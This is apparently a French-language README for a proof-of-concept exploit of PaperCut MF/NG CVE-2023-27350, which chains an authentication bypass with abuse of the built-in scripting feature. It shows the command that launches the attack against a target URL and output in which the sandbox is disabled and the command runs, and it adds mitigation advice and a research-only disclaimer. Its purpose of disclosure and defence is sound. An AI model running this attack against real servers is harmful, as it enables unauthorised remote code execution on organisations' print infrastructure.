
Exploit de preuve de concept pour PaperCut CVE-2023-27350, enchaînant un contournement d'authentification avec l'abus de scripts intégrés pour obtenir une exécution de code à distance sur des instances MF/NG vulnérables.
POC pour CVE-2023-27350 affectant PaperCut MF/NG
Une analyse technique de la cause racine de la vulnérabilité, des indicateurs de compromission et de l'exposition sur Internet est disponible sur notre blog : https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Ce POC utilise une vulnérabilité de contournement d'authentification combinée à l'abus de fonctionnalités de script intégrées pour exécuter du code.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Mettez à jour vers la dernière version ou atténuez en suivant les instructions dans l'avis de sécurité PaperCut
Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les responsables du projet ne sont pas responsables en cas d'utilisation abusive du logiciel. Utilisez-le de manière responsable.